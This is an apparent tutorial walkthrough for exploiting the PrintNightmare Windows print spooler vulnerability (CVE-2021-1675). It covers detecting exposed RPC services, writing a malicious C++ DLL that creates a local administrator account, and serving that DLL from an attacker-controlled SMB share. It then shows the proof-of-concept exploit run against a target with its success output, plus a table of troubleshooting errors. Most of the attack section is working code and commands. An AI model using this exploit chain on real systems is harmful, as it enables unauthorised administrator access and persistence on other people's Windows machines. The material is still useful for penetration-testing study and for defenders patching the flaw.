# Exploiting Print Nightmare

By @kcasyn

This is to provide a simple walkthrough of the process to discover and exploit the Print Nightmare vulnerability.

### Required Tools

**Print Nightmare PoC:** https://github.com/cube0x0/CVE-2021-1675

Simply clone the repository from GitHub for the PoC.

`git clone https://github.com/cube0x0/CVE-2021-1675.git`

**Impacket:** https://github.com/SecureAuthCorp/impacket

As of 9/25/21 you must git clone and install impacket from source to have the required functions for the PoC to work. This should be fixed when Impacket-v0.9.24 gets released. I like to have impacket installed via `pipx` as well to have easy access to the standalone scripts.

```
sudo apt remove python3-impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
```

## The Process

### The Discovery

Use `rpcdump.py` to check if the print rpc services are available.

```
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol
```

### The DLL

We need to create a malicious DLL to be loaded that execute the commands we want. This can be done by creating a new C++ DLL project in Visual Studio 2019 and modifying the main file as below.

**DLL Example**

```
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: // This section is what you modify for custom payloads
        system("cmd.exe /c net user kcaysn Password123! /add");
        system("cmd.exe /c net localgroup administrators kcasyn /add");
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

Then compile the DLL by setting the build to Release x64 and building the solution.

### The SMB Server

The impacket script `smbserver.py` can be used to serve the malicious DLL over SMB from the directory of your choice.

`smbserver.py smb /tmp/`

### The Exploit

Run the `CVE-2021-1675.py` script once you have created the malicious DLL and are serving it via SMB.

```
python3 CVE-2021-1675.py 'TEST/pnight:Password123!@192.168.1.11' '\\192.168.1.102\smb\print-nightmare.dll'
[*] Connecting to ncacn_np:192.168.1.11[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.1.102\smb\print-nightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Stage2: 0
[+] Exploit Completed
```

Enjoy system access!

### Note on Errors

Below are some possible reasons for errors:

| Error | Reason |
| ----- | ------ |
| `impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied` | permissions on the file in the SMB share |
| `impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.` | user in `smb.conf` does not exist (Using samba server instead of `smbclient.py`) |
| `RPRN SessionError: unknown error code: 0x8001011b` | This seems to be an RPC access denied error and appears to mean the device is patched or not exploitable |

### References

- https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
- https://github.com/SecureAuthCorp/impacket
- https://github.com/cube0x0/CVE-2021-1675